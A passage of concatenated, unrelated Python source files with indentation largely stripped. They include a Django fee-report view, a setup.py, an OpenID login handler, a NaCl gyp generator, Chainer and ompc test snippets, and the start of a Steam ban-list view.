total_a_receber_neste_mes += mensalidade.valor_cobrado
if mensalidades_recebidas_neste_mes:
numero_de_mensalidades_recebidas_neste_mes = len(mensalidades_recebidas_neste_mes)
for mensalidade in mensalidades_recebidas_neste_mes:
total_recebido_neste_mes += mensalidade.valor_pago
if mensalidades_recebidas_ultimos_meses:
numero_de_mensalidades_recebidas_ultimos_meses = len(mensalidades_recebidas_ultimos_meses)
primeira_mensalidade = mensalidades_recebidas_ultimos_meses[0]
str_mes_para_comparacao = str(primeira_mensalidade.mes_referencia)
str_ano_para_comparacao = str(primeira_mensalidade.ano_referencia)
if len(str_mes_para_comparacao) == 1:
str_mes_para_comparacao = '0'+str_mes_para_comparacao
valor_do_mes_da_vez = 0
valor_de_meses_anteriores_da_vez = 0
total_mes = 0
total_meses_anteriores = 0
for mensalidade in mensalidades_recebidas_ultimos_meses:
str_mes_da_vez = str(mensalidade.mes_referencia)
str_ano_da_vez = str(mensalidade.ano_referencia)
if len(str_mes_da_vez) == 1:
str_mes_da_vez = '0'+str_mes_da_vez
if str_mes_da_vez != str_mes_para_comparacao:
chave = str_ano_para_comparacao+'_'+str_mes_para_comparacao
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': valor_do_mes_da_vez, \
'valor_de_meses_anteriores': valor_de_meses_anteriores_da_vez ,\
'valor_total_do_mes': (valor_do_mes_da_vez+valor_de_meses_anteriores_da_vez)})
valor_do_mes_da_vez = 0
valor_de_meses_anteriores_da_vez = 0
str_mes_para_comparacao = str_mes_da_vez
if mensalidade.get_pago_em_dia():
valor_do_mes_da_vez += mensalidade.valor_pago
total_mes += mensalidade.valor_pago
else:
valor_de_meses_anteriores_da_vez += mensalidade.valor_pago
total_meses_anteriores += mensalidade.valor_pago
# accumulate the values of the last monthly fee
chave = str_ano_para_comparacao+'_'+str_mes_para_comparacao
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': valor_do_mes_da_vez, \
'valor_de_meses_anteriores': valor_de_meses_anteriores_da_vez ,\
'valor_total_do_mes': (valor_do_mes_da_vez+valor_de_meses_anteriores_da_vez)})
# build a grand total
chave = 'Total'
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': total_mes, \
'valor_de_meses_anteriores': total_meses_anteriores ,\
'valor_total_do_mes': (total_mes+total_meses_anteriores)})
if mensalidades_recebidas_ultimos_meses:
mensagem_retorno = str(len(mensalidades_recebidas_ultimos_meses))+ \
' mensalidades recebidas'
mensagem_retorno_2 = '(nos últimos '+str(NUMERO_MESES_AVALIADOS)+' meses, incluindo mês atual)'
else:
mensagem_retorno = 'Não encontrada nenhuma mensalidade recebida nos últimos '+ \
str(NUMERO_MESES_AVALIADOS)+' meses!'
context = {'mensagem_retorno': mensagem_retorno, 'mensagem_retorno_2': mensagem_retorno_2, \
'total_recebido_por_mes_ano': total_recebido_por_mes_ano, 'total_a_receber_neste_mes': \
total_a_receber_neste_mes, 'total_recebido_neste_mes': total_recebido_neste_mes, \
'numero_de_mensalidades_recebidas_ultimos_meses': numero_de_mensalidades_recebidas_ultimos_meses,
'numero_de_mensalidades_recebidas_neste_mes': numero_de_mensalidades_recebidas_neste_mes,
'numero_de_mensalidades_a_receber_neste_mes': numero_de_mensalidades_a_receber_neste_mes, }
return render(request,"mensalidades_recebidas.html",context)
|
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)), "README.md")) as fp:
long_description = fp.read()
setup(
name="multicontents",
version="0.3.0",
description="providing contents from multiple sources in jupyter notebook",
long_description_content_type="text/markdown",
long_description=long_description,
url="https://github.com/lydian/multicontents",
author="Lydian Lee",
author_email="lydianly@gmail.com",
maintainer="Lydian Lee",
maintainer_email="lydianly@gmail.com",
packages=find_packages(),
install_requires=["notebook", "ipykernel"],
python_requires=">=3.6",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
],
)
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
from model import *
from lib.py.belay import *
from utils import *
from openid import fetchers
from openid.consumer import consumer
from openid.extensions import ax
from gae_openid_store import AppEngineOpenIDStore
import datetime
import logging
import identities
from google.appengine.api import urlfetch
class UrlfetchFetcher(fetchers.HTTPFetcher):
"""An C{L{HTTPFetcher}} that uses AppEngine's urlfetch.
"""
def fetch(self, url, body=None, headers=None):
if headers is None:
headers = {}
headers.setdefault(
'User-Agent',
"%s Python-urlfetch" % (fetchers.USER_AGENT))
f = urlfetch.fetch(url,
method=(urlfetch.POST if body else urlfetch.GET),
headers=headers,
payload=body,
validate_certificate=True)
resp = fetchers.HTTPResponse()
resp.body = f.content
resp.final_url = f.final_url or url
resp.headers = f.headers
resp.status = f.status_code
return resp
fetchers.setDefaultFetcher(UrlfetchFetcher())
EMAIL_ATTR = 'http://axschema.org/contact/email'
VERIFIED_EMAIL_ATTR = 'http://axschema.org/contact/verifiedemail'
NAME_ATTR = 'http://axschema.org/namePerson'
FIRST_NAME_ATTR = 'http://axschema.org/namePerson/first'
LAST_NAME_ATTR = 'http://axschema.org/namePerson/last'
FRIENDLY_NAME_ATTR = 'http://axschema.org/namePerson/friendly'
GENDER_ATTR = 'http://axschema.org/person/gender'
BIRTH_DATE_ATTR = 'http://axschema.org/birthDate'
AVATAR_ATTR = 'http://axschema.org/media/image/default'
class LaunchHandler(CapHandler):
def get(self):
c = consumer.Consumer({}, AppEngineOpenIDStore())
auth_request = c.begin(self.discoveryUrl())
auth_request.addExtension(self.buildAttributeRequest())
callback = self.callbackUrl()
realm = self.server_url('')
form = auth_request.formMarkup(realm, callback, False, {})
reply = {
'page': { 'html': self.server_url('/addOpenId.html') },
'info': {
'formContent': form
}
}
self.bcapResponse(reply)
def callbackUrl(self):
station = self.get_entity()
return self.cap_server.regrant(self.callbackClass(), station).serialize()
def buildAttributeRequest(self):
ax_request = ax.FetchRequest()
attributes = [
EMAIL_ATTR,
VERIFIED_EMAIL_ATTR,
NAME_ATTR,
FIRST_NAME_ATTR,
LAST_NAME_ATTR,
FRIENDLY_NAME_ATTR,
GENDER_ATTR,
BIRTH_DATE_ATTR,
AVATAR_ATTR,
]
for attr in attributes:
ax_request.add(ax.AttrInfo(attr, required=True))
return ax_request
# TODO(mzero): These should be doing discovery to find the endpoint URLs
class GoogleLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'https://www.google.com/accounts/o8/id'
def callbackClass(self):
return GoogleCallbackHandler
class YahooLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'https://yahoo.com/'
def callbackClass(self):
return YahooCallbackHandler
class AolLaunchHandler(LaunchHandler):
def discoveryUrl(self):
return 'http://aol.com/'
def callbackClass(self):
return AolCallbackHandler
def stripPrefix(prefix, s):
if s.startswith(prefix):
return s[len(prefix):]
else:
return None
def extractAliases(prefix, args):
r = dict()
for (k, v) in args.iteritems():
a = stripPrefix(prefix, k)
if a:
r[v] = a
return r
def permuteAttributes(ax):
# reform attributes from AX names and format to our names and format
attrs = dict()
v = []
v.extend(ax.data.get(NAME_ATTR, []))
v.extend(ax.data.get(FRIENDLY_NAME_ATTR, []))
fns = ax.data.get(FIRST_NAME_ATTR, [])
lns = ax.data.get(LAST_NAME_ATTR, [])
v.extend([f + ' ' + l for (f, l) in zip(fns,lns)])
# not clear if the first and last name values sets are 'aligned' like this
if v:
attrs['name'] = v
v = []
v.extend(ax.data.get(VERIFIED_EMAIL_ATTR, []))
v.extend(ax.data.get(EMAIL_ATTR, []))
if v:
attrs['email'] = v
v = []
v.extend(ax.data.get(AVATAR_ATTR, []))
if v:
attrs['image'] = v
if GENDER_ATTR in ax.data:
gender = ax.data.get(GENDER_ATTR)[0]
if gender == 'M':
attrs['gender'] = ['male']
elif gender == 'F':
attrs['gender'] = ['female']
else:
attrs['gender'] = ['other']
v = []
v.extend(ax.data.get(BIRTH_DATE_ATTR, []))
if v:
ages = []
for d in v:
try:
bdate = datetime.datetime.strptime(d, "%Y-%m-%d")
now = datetime.datetime.today()
age = now.year - bdate.year
if (now.month < bdate.month or
(now.month == bdate.month and now.day < bdate.day)):
age -= 1
ages.append(str(age))
except Exception:
# ignore birth dates that cannot be parsed
pass
attrs['age'] = ages
return attrs
class CallbackHandler(CapHandler):
def get(self):
self.handleOpenIdResponse(self.request.GET)
def post(self):
self.handleOpenIdResponse(self.request.POST)
def handleOpenIdResponse(self, args):
c = consumer.Consumer({}, AppEngineOpenIDStore())
result = c.complete(args, self.server_url(self.requestPath()))
if result.status == consumer.SUCCESS:
ax_response = ax.FetchResponse.fromSuccessResponse(result)
self.handleSuccess(result.identity_url, ax_response)
else: # NOTE(mzero): generally result.status == consumer.FAILURE
self.handleFailure(result.message)
def handleSuccess(self, identity_url, ax_response):
self.addIdentity(identity_url, ax_response)
page = self.buildClosePage()
#page = self.buildDebuggingPage(args, attrs)
self.writeOutPage(page);
def handleFailure(self, message):
logging.getLogger().info('openid request failed: %s' % message)
page = self.buildFailPage()
self.writeOutPage(page);
def writeOutPage(self, page):
self.response.headers["Cache-Control"] = "no-cache"
self.response.headers["Expires"] = "Fri, 01 Jan 1990 00:00:00 GMT"
self.response.content_type = "text/html;charset=UTF-8"
self.response.body = page
def addIdentity(self, identity_url, ax_response):
station = self.get_entity()
if ax_response:
attrs = permuteAttributes(ax_response)
else:
attrs = {}
IdentityData(
parent=station,
id_type='openid',
id_provider=self.provider(),
account_name=identity_url,
display_name=attrs.get('name', [None])[0],
attributes=json.dumps(attrs)
).put()
def buildDebuggingPage(self, args, attrs):
page = "<html><body>"
page += "<h1>results</h1><dl>"
for (k, v) in args.iteritems():
page += "<dt>" + cgi.escape(k) + "</dt><dd>" + cgi.escape(v) + "</dd>"
page += "</dl>"
page += "<h1>attributes</h1><dl>"
for (k, v) in attrs.iteritems():
page += "<dt>" + cgi.escape(k) + "</dt><dd>" + cgi.escape(' -- '.join(v)) + "</dd>"
page += "</dl>"
page += "</body></html>"
return page
def buildClosePage(self):
return '''<html>
<body><h1>Done!</h1>
<script>
window.opener.postMessage('done', '*');
setTimeout(function() { window.close(); }, 50);
</script></body>
</html>'''
def buildFailPage(self):
return '''<html>
<body><h1>Failed!</h1>
<p>The request to authenticate with your identity provider failed. You
may close this window when ready.</p>
<script>
window.opener.postMessage('done', '*');
</script></body>
</html>'''
def requestPath(self):
return self.request.path_info_cap
class GoogleCallbackHandler(CallbackHandler):
def provider(self):
return identities.GOOGLE_PROVIDER
class YahooCallbackHandler(CallbackHandler):
def provider(self):
return identities.YAHOO_PROVIDER
class AolCallbackHandler(CallbackHandler):
def provider(self):
return identities.AOL_PROVIDER
class LoginCallbackHandler(CallbackHandler):
def handleSuccess(self, identity_url, ax_response):
q = IdentityData.all()
q.filter('id_type =', 'openid')
q.filter('id_provider =', self.provider())
q.filter('account_name =', identity_url)
results = [ r for r in q.fetch(2) ]
page = ''
if len(results) == 0:
logging.getLogger().debug('new station for: %s' % identity_url)
station = StationData.create()
self.set_entity(station)
self.addIdentity(identity_url, ax_response)
page = self.buildStationPage(
"New Station",
"""A new station has been created for you.
Use this same identity to get back to it.""",
station.key())
elif len(results) == 1:
logging.getLogger().debug('login for: %s' % identity_url)
identity = results[0]
if ax_response:
attrs = permuteAttributes(ax_response)
identity.attributes = json.dumps(attrs)
identity.put()
station = identity.parent()
self.set_entity(station)
page = self.buildStationPage(
"Station Login",
"""We have your station.""",
station.key())
else:
logging.getLogger().debug('multiple stations for: %s' % identity_url)
            page = self.buildMultipleStationPage()
        self.writeOutPage(page)
def requestPath(self):
return self.request.path_info
def buildStationPage(self, header, message, stationKey):
return '''<html>
<head>
<title>{header}</title>
<script src="/lib/js/include-belay.js"></script>
</head>
<body><h1>{header}</h1>
<p>{message}</p>
<script>
localStorage.setItem('launchCap', '{url}');
localStorage.setItem('launchCap-authenticated-time', Date.now());
window.close();
</script></body>
</html>'''.format(
header=header, message=message, url=self.server_url(launch_path(stationKey)))
def buildMultipleStationPage(self):
return '''<html>
<body><h1>Multiple Stations</h1>
<p>That identity is associated with multiple stations.</p>
<script>
window.opener.postMessage('done', '*');
</script></body>
</html>'''
# TODO(mzero): these callbackUrl() calls must match the map in station.py
class GoogleLoginLaunchHandler(GoogleLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/google/callback")
class YahooLoginLaunchHandler(YahooLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/yahoo/callback")
class AolLoginLaunchHandler(AolLaunchHandler):
def callbackUrl(self):
return self.server_url("/login/openid/aol/callback")
class GoogleLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.GOOGLE_PROVIDER
class YahooLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.YAHOO_PROVIDER
class AolLoginCallbackHandler(LoginCallbackHandler):
def provider(self):
return identities.AOL_PROVIDER
def loginIdentityHandlers():
return
|
import ompc
from ompclib.ompclib_numpy import _marray, _size, _dtype
def build_return(nargout, *args):
ret = []
for x in args[:nargout]:
if isinstance(x, _marray): ret += [ x ]
else: ret += [ _marray(_dtype(x), _size(x), x) ]
if len(ret) == 1:
ret = ret[0]
return ret
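# Hedged illustration of the nargout convention emulated by build_return: with
# nargout == 1 only the first value is wrapped and returned bare, while with
# nargout == 2 both values come back as a list of _marray objects.  This helper
# is an added example and is not called elsewhere.
def _nargout_example():
    single = build_return(1, 1, 2)   # one _marray wrapping the value 1
    pair = build_return(2, 1, 2)     # list of two _marray objects
    return single, pair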
def func1():
nargout = 1
a, b = 1, 2
return build_return(nargout, a, b)
def func2():
nargout = 2
a, b = [1,2,3], [[2]]
return build_return(nargout, a, b)
from ompc import byteplay
c1 = byteplay.Code.from_code(func1.func_code)
c2 = byteplay.Code.from_code(func2.func_code)
print c1.code
print c2.code
print func1()
a, b = func2()
print a
print b
|
# Import required MicroPython libraries.
from usys import stdin
from uselect import poll
# Register the standard input so we can read keyboard presses.
keyboard = poll()
keyboard.register(stdin)
while True:
    # Check whether a key has been pressed; poll(0) returns immediately, so this check never blocks.
if keyboard.poll(0):
# Read the key and print it.
key = stdin.read(1)
print("You pressed:", key)
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import StringIO
import sys
import os
import optparse
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(os.path.dirname(SCRIPT_DIR), 'tools'))
import getos
valid_tools = ['newlib', 'glibc', getos.GetPlatform()]
def Error(msg):
print(msg)
sys.exit(1)
PREAMBLE = """\
{
'includes': ['%s/build_tools/nacl.gypi'],
"""
NEXE_TARGET = """\
{
'target_name': '%(NAME)s_x86_32%(EXT)s',
'product_name': '%(NAME)s_x86_32%(EXT)s',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'cflags': ['-m32', '-pedantic'] + %(CFLAGS)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'ldflags': ['-m32', '-L../../lib/x86_32/<(CONFIGURATION_NAME)'],
'toolset': 'target',
%(CONFIGS)s
},
{
'target_name': '%(NAME)s_x86_64%(EXT)s',
'product_name': '%(NAME)s_x86_64%(EXT)s',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'cflags': ['-m64', '-pedantic'] + %(CFLAGS)s,
'ldflags': ['-m64', '-L../../lib/x86_64/<(CONFIGURATION_NAME)'],
'toolset': 'target',
%(CONFIGS)s
},
"""
NLIB_TARGET = """\
{
'target_name': '%(NAME)s_x86_32%(EXT)s',
'product_name': 'lib%(NAME)s%(EXT)s',
'product_dir': '../../lib/x86_32/<(CONFIGURATION_NAME)',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'cflags': ['-m32', '-pedantic'] + %(CFLAGS)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'ldflags': ['-m32'],
'toolset': 'target',
%(CONFIGS)s
},
{
'target_name': '%(NAME)s_x86_64%(EXT)s',
'product_name': 'lib%(NAME)s%(EXT)s',
'product_dir': '../../lib/x86_64/<(CONFIGURATION_NAME)',
'type': '%(GYP_TYPE)s',
'sources': %(SOURCES)s,
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['newlib-debug', 'newlib-release',
'glibc-debug', 'glibc-release'],
'cflags': ['-m64', '-pedantic'] + %(CFLAGS)s,
'ldflags': ['-m64'],
'toolset': 'target',
%(CONFIGS)s
},
"""
HOST_LIB_TARGET = """\
{
'target_name': '%(NAME)s%(EXT)s',
'type': '%(GYP_TYPE)s',
'toolset': 'host',
'sources': %(SOURCES)s,
'cflags': %(CFLAGS)s,
'cflags_c': ['-std=gnu99'],
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['host-debug', 'host-release'],
'product_dir': '../../lib/%(ARCH)s/<(CONFIGURATION_NAME)',
'product_name': '%(NAME)s%(EXT)s',
%(CONFIGS)s
},
"""
HOST_EXE_TARGET = """\
{
'target_name': '%(NAME)s%(EXT)s',
'type': '%(GYP_TYPE)s',
'toolset': 'host',
'sources': %(SOURCES)s,
'cflags': %(CFLAGS)s,
'cflags_c': ['-std=gnu99'],
'ldflags': ['-L../../lib/%(ARCH)s/<(CONFIGURATION_NAME)'],
'libraries': %(LIBS)s,
'include_dirs': %(INCLUDES)s,
'make_valid_configurations': ['host-debug', 'host-release'],
'msvs_settings': {
'VCLinkerTool': {
'AdditionalLibraryDirectories':
['../../lib/%(ARCH)s/<(CONFIGURATION_NAME)'],
}
},
%(CONFIGS)s
},
"""
NMF_TARGET = """\
{
'target_name': '%(NAME)s_%(TOOLCHAIN)s.nmf',
'product_name': '%(NAME)s.nmf',
'product_dir': '<(PRODUCT_DIR)/%(TOOLCHAIN)s',
'type': 'none',
'make_valid_configurations': ['%(TOOLCHAIN)s-debug', '%(TOOLCHAIN)s-release'],
'actions': [
{
'action_name': 'nmf',
'inputs': ['<(PRODUCT_DIR)/%(NAME)s_x86_32.nexe',
'<(PRODUCT_DIR)/%(NAME)s_x86_64.nexe'] + %(SODEPS)s,
'outputs': ['<(PRODUCT_DIR)/%(NAME)s.nmf'],
'action': ['../../tools/create_nmf.py', '-t', '%(TOOLCHAIN)s', '-s',
'<(PRODUCT_DIR)'] + %(NMFACTION)s,
},
]
},
"""
TOOLCHAIN_CONFIG = """\
'%(toolchain)s-release' : {
'cflags' : ['-O2'],
},
'%(toolchain)s-debug' : {
'cflags' : ['-g', '-O0'],
},
"""
NEXE_CONFIG = """\
'%(toolchain)s-release' : {
'cflags' : ['--%(toolchain)s', '-O2',
'-idirafter', '../../include'],
'ldflags' : ['--%(toolchain)s'],
'arflags' : ['--%(toolchain)s'],
},
'%(toolchain)s-debug' : {
'cflags' : ['--%(toolchain)s', '-g', '-O0',
'-idirafter', '../../include'],
'ldflags' : ['--%(toolchain)s'],
'arflags' : ['--%(toolchain)s'],
},
"""
WIN32_CONFIGS = """\
'target_defaults': {
'default_configuration': 'Debug_PPAPI',
'configurations': {
'Debug_PPAPI': {
'msvs_configuration_platform': 'PPAPI',
'msbuild_configuration_attributes': {
'ConfigurationType': 'DynamicLibrary'
},
'include_dirs': ['../../include/win'],
'defines': ['_WINDOWS', '_DEBUG', 'WIN32'],
},
'Release_PPAPI': {
'msvs_configuration_platform': 'PPAPI',
'msbuild_configuration_attributes': {
'ConfigurationType': 'DynamicLibrary'
},
'include_dirs': ['../../include/win'],
'defines': ['_WINDOWS', 'NDEBUG', 'WIN32'],
},
'Debug_NaCl': {
'msvs_configuration_platform': 'NaCl',
'msbuild_configuration_attributes': {
'ConfigurationType': 'Application'
},
},
'Release_NaCl': {
'msvs_configuration_platform': 'NaCl',
'msbuild_configuration_attributes': {
'ConfigurationType': 'Application'
},
},
},
},
"""
def WriteNaClTargets(output, target, tools):
configs = "'configurations' : {\n"
for tc in tools:
if tc not in valid_tools:
continue
if tc in ['newlib', 'glibc']:
configs += NEXE_CONFIG % {'toolchain': tc}
configs += " }"
target['CONFIGS'] = configs
if target['TYPE'] == 'lib':
output.write(NLIB_TARGET % target)
else:
output.write(NEXE_TARGET % target)
def ConfigName(toolchain):
if toolchain == getos.GetPlatform():
return 'host'
else:
return toolchain
def ProcessDSC(filename, outfile=None):
if not os.path.exists(filename):
Error("file not found: %s" % filename)
desc = open(filename).read()
desc = eval(desc, {}, {})
if not desc.get('TARGETS'):
Error("no TARGETS found in dsc")
if not outfile:
outfile = desc['NAME'] + '.gyp'
outfile = os.path.join(os.path.dirname(filename), outfile)
output = StringIO.StringIO()
srcdir = os.path.dirname(SCRIPT_DIR)
output.write(PREAMBLE % srcdir.replace("\\", '/'))
win32 = sys.platform in ('win32', 'cygwin')
if win32:
output.write(WIN32_CONFIGS)
else:
for tc in desc['TOOLS']:
if tc in valid_tools:
default = '%s-debug' % ConfigName(tc)
break
output.write("""\
'target_defaults': {
'default_configuration': '%s',
'configurations' : {\n""" % default)
for tc in desc['TOOLS']:
if tc not in valid_tools:
continue
output.write(TOOLCHAIN_CONFIG % {'toolchain': ConfigName(tc)})
output.write(" }\n },\n")
output.write("\n 'targets': [\n")
# make a list of all the so target names so that the nmf rules
# can depend on them all
sofiles = []
soremap = []
for target in desc['TARGETS']:
if target['TYPE'] == 'so':
name = target['NAME']
sofiles.append('<(PRODUCT_DIR)/%s_x86_64.so' % name)
sofiles.append('<(PRODUCT_DIR)/%s_x86_32.so' % name)
soremap += ['-n', '%s_x86_64.so,%s.so' % (name, name)]
soremap += ['-n', '%s_x86_32.so,%s.so' % (name, name)]
# iterate through dsc targets generating gyp targets
for target in desc['TARGETS']:
target.setdefault('INCLUDES', [])
target['INCLUDES'] = [x.replace("$(NACL_SDK_ROOT)", "../..")
for x in target['INCLUDES']]
libs = target.get('LIBS', [])
if win32:
libs = [l for l in libs if l not in ('ppapi', 'ppapi_cpp')]
target['LIBS'] = ['-l' + l + '.lib' for l in libs]
else:
target['LIBS'] = ['-l' + l for l in libs]
if target['TYPE'] == 'so':
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.so'
target['GYP_TYPE'] = 'shared_library'
elif target['TYPE'] == 'lib':
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.a'
target['GYP_TYPE'] = 'static_library'
elif target['TYPE'] == 'main':
target['EXT'] = '.nexe'
target['GYP_TYPE'] = 'executable'
else:
Error("unknown type: %s" % target['TYPE'])
target['CFLAGS'] = target.get('CXXFLAGS', [])
if not win32 and ('newlib' in desc['TOOLS'] or 'glibc' in desc['TOOLS']):
WriteNaClTargets(output, target, desc['TOOLS'])
if target['TYPE'] == 'main':
target['SODEPS'] = sofiles
target['NMFACTION'] = ['-o', '<@(_outputs)', '-L<(NMF_PATH1)',
'-L<(NMF_PATH2)', '-D', '<(OBJDUMP)',
'<@(_inputs)']
target['NMFACTION'] += soremap
if 'newlib' in desc['TOOLS']:
target['TOOLCHAIN'] = 'newlib'
output.write(NMF_TARGET % target)
if 'glibc' in desc['TOOLS']:
target['TOOLCHAIN'] = 'glibc'
output.write(NMF_TARGET % target)
if win32 or getos.GetPlatform() in desc['TOOLS']:
target['ARCH'] = 'x86_32'
target['INCLUDES'].append('../../include')
if win32:
target['HOST'] = 'win'
target['CONFIGS'] = ''
target['CFLAGS'] = []
else:
target['CONFIGS'] = ''
target['HOST'] = 'linux'
target['CFLAGS'].append('-fPIC')
if target['TYPE'] == 'main':
target['GYP_TYPE'] = 'shared_library'
if win32:
target['EXT'] = ''
else:
target['EXT'] = '.so'
output.write(HOST_EXE_TARGET % target)
else:
output.write(HOST_LIB_TARGET % target)
output.write(' ],\n}\n')
print('Writing: ' + outfile)
open(outfile, 'w').write(output.getvalue())
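# Illustrative sketch of the .dsc structure ProcessDSC expects, inferred from
# the keys read above; the names and values are assumptions for demonstration,
# not a real SDK example.
EXAMPLE_DSC = {
  'NAME': 'hello_world',
  'TOOLS': ['newlib', 'glibc'],
  'TARGETS': [
    {
      'NAME': 'hello_world',
      'TYPE': 'main',                       # one of 'main', 'lib', 'so'
      'SOURCES': ['hello_world.c'],
      'LIBS': ['ppapi', 'pthread'],
      'CXXFLAGS': [],
      'INCLUDES': ['$(NACL_SDK_ROOT)/include'],
    },
  ],
}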
def main(args):
parser = optparse.OptionParser()
parser.add_option('-o', help='Set output filename.', dest='output')
options, args = parser.parse_args(args)
if not args:
Error('No .dsc file specified.')
if options.output:
outdir = os.path.dirname(options.output)
if not os.path.exists(outdir):
os.makedirs(outdir)
assert len(args) == 1
ProcessDSC(args[0], options.output)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
"""
This module encapsulates the interactions with uw_gws for the
valid-endorser authorization test.
Valid endorsers are defined as members of the GWS group named by
VALID_ENDORSER_GROUP. Unless overridden in settings, the group
used for validation is "uw_employee".
"""
from endorsement.util.log import log_exception
from restclients_core.exceptions import DataFailureException
from uw_gws import GWS
import logging
import traceback
logger = logging.getLogger(__name__)
gws = GWS()
def is_group_member(uwnetid, group):
"""
Return True if the netid is in the specified group
"""
try:
return gws.is_effective_member(group, uwnetid)
except DataFailureException as ex:
if ex.status == 404:
return False
log_exception(logger,
'{0} is_effective_member of {1} group'.format(
uwnetid, group),
traceback.format_exc())
raise
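# Illustrative usage sketch, not part of the original module; the group name
# mirrors the default mentioned in the module docstring and the netid argument
# is a placeholder.
def _example_is_valid_endorser(uwnetid):
    return is_group_member(uwnetid, 'uw_employee')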
|
# coding: utf-8
import chainer
import chainer.functions as F
class Default(chainer.Chain):
def __init__(self):
super(Default, self).__init__()
def forward(self, x):
y1 = F.leaky_relu(x)
return y1
class Slope(chainer.Chain):
def __init__(self):
super(Slope, self).__init__()
def forward(self, x):
y1 = F.leaky_relu(x, slope=0.1)
return y1
# ======================================
from chainer_compiler.elichika import testtools
import numpy as np
def main():
x = np.random.rand(6, 4).astype(np.float32) - 0.5
testtools.generate_testcase(Default(), [x])
testtools.generate_testcase(Slope(), [x], subname='slope')
if __name__ == '__main__':
main()
|
from .functions import evaluate, init_params, train # NOQA
|
# coding: utf-8
from django.shortcuts import render, get_object_or_404
#from social.apps.django_app.default.models import UserSocialAuth
from social_django.models import UserSocialAuth
from djangobb_forum.models import Profile
from django.http import HttpResponseRedirect, HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
import time
from django.contrib import messages
from django.utils.translation import ugettext as _
from django.urls import reverse
from .forms import BanForm, UnbanForm, CommentForm, RebanForm
from .models import Ban, Comment
from django.contrib.auth.decorators import login_required
from django.db.models import Q
# Base steamid
steamid64ident = 76561197960265728
def getSteam64FromString(steamid):
steam64id = 76561197960265728
id_split = steamid.split(":")
try:
        steam64id += int(id_split[2]) * 2  # the 64-bit ID stores the account as 2*Z + Y, so Z is doubled here
except (IndexError, ValueError):
return "Invalid Steam ID"
if id_split[1] == "1":
steam64id += 1
return steam64id
def getSteam3FromString(steamid):
# X = int(steamid[6:7])
Y = int(steamid[8:9])
Z = int(steamid[10:])
steam3 = "[U:{}:{}]".format( Y, Z*2 + Y )
return steam3
def commid_to_steamid(commid):
steamid = []
steamid.append('STEAM_0:')
steamidacct = int(commid) - steamid64ident
steamid.append('0:') if steamidacct % 2 == 0 else steamid.append('1:')
steamid.append(str(steamidacct // 2))
return ''.join(steamid)
def commid_to_steam3(commid):
difference = int(commid) - steamid64ident
Y = 0 if difference % 2 == 0 else 1
# return "[U:{}:{}]".format( Y, difference + Y)
return "[U:{}:{}]".format(Y, difference)
def index(request):
unban_form = UnbanForm()
comment_form = CommentForm()
reban_form = RebanForm()
query = request.GET.get('q')
if query:
bans = Ban.objects.filter(Q(name__icontains=query) | Q(authid=query)).distinct()
else:
bans = Ban.objects.all()
num_bans = bans.count()
# Show 16 bans per page.
paginator = Paginator(bans, 16)
page = request.GET.get('page')
try:
bans = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
bans = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
bans = paginator.page(paginator.num_pages)
# Get the logged-in user
    if request.user.is_authenticated:
username = request.user.username
else:
username = ""
for ban in bans:
parseBan(ban)
return render(request, 'bans/ban_list.html', {'bans': bans,
'num_bans': num_bans,
'username': username,
'unban_form': unban_form,
'reban_form': reban_form,
'comment_form': comment_form})
def search(request):
unban_form = UnbanForm()
comment_form = CommentForm()
reban_form = RebanForm()
    if 'user' not in request.GET or request.GET.get("user") == "":
messages.error(request, _("Please specify a user to search for."))
return render(request, 'bans/ban_search.html')
else:
try:
bans = Ban.objects.filter(authid=request.GET.get("user"))
count = bans.count()
socialAuthUserID = UserSocialAuth.objects.get(uid=request.GET.get("user")).user_id
# name = Profile.objects.get(user_id=socialAuthUserID).user.username
except UserSocialAuth.DoesNotExist:
if count == 0:
messages.error(request, _("This user does not exist."))
return render(request, 'bans/ban_search.html')
